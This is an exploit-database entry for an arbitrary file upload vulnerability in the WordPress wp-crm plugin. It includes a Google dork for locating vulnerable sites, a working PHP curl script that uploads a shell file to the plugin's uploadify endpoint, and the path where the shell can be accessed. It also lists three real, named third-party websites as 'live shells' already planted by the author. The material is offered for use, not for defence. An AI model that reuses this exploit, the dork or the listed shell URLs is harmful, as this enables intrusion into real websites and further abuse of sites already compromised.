WordPress wp-crm Plugin Arbitrary File Upload Vulnerability



EKU-ID: 4115 CVE: OSVDB-ID:
Author: brunox Published: 2014-06-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#############################################################################################
  
                                                                                            #
  
# Title : WordPress wp-crm Plugin Arbitrary File Upload Vulnerability                       #
  
                                                                                            #
  
# Author : X-Bruno                                                                          #
  
                                                                                            #
  
# Date : 27/06/2014                                                                         #
  
                                                                                            #
  
# Facebook : http://www.facebook.com/Inj3ct.Bruno                                           #
  
                                                                                            #
  
                                                                                            #
  
# Email: brunox338@gmail.com                                                                #
  
                                                                                            #
  
                                                                                            #
  
# Vendor : www.wordpress.org                                                                #
  
                                                                                            #
  
                                                                                            #
  
#Googe Dork : inurl:/wp-content/plugins/wp-crm/                                             #
  
                                                                                            #
  
                                                                                            #
  
# Tested on : Linux                                                                         #
  
                                                                                            #
  
#############################################################################################
  
  
Exploit : upload shell/.php
  
  
  
<?php
$uploadfile="Bruno.php";
$ch = curl_init("http://localhost/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>"/wordpress/wp-content/plugins/wp-property/third-party/uploadify/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
  
  
-------------------------------
  
<?php
  
phpinfo();
  
?>
  
-------------------------------
  
Shell Access ==== > http://localhost/wordpress/wp-content/plugins/wp-crm/third-party/uploadify/(shell_name.php)
  
--------------------------------
  
Examples : (Live Shells) 
  
  
1- http://www.transport9.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
  
2- http://adbuzzler.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
  
3- http://ourladyofthecape.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
  
  
#####################################################################
  
  
# Greeting : Toomy Jone , Injector Hacker , Dr.SHA6H , HunTerS - Team #
  
  
#####################################################################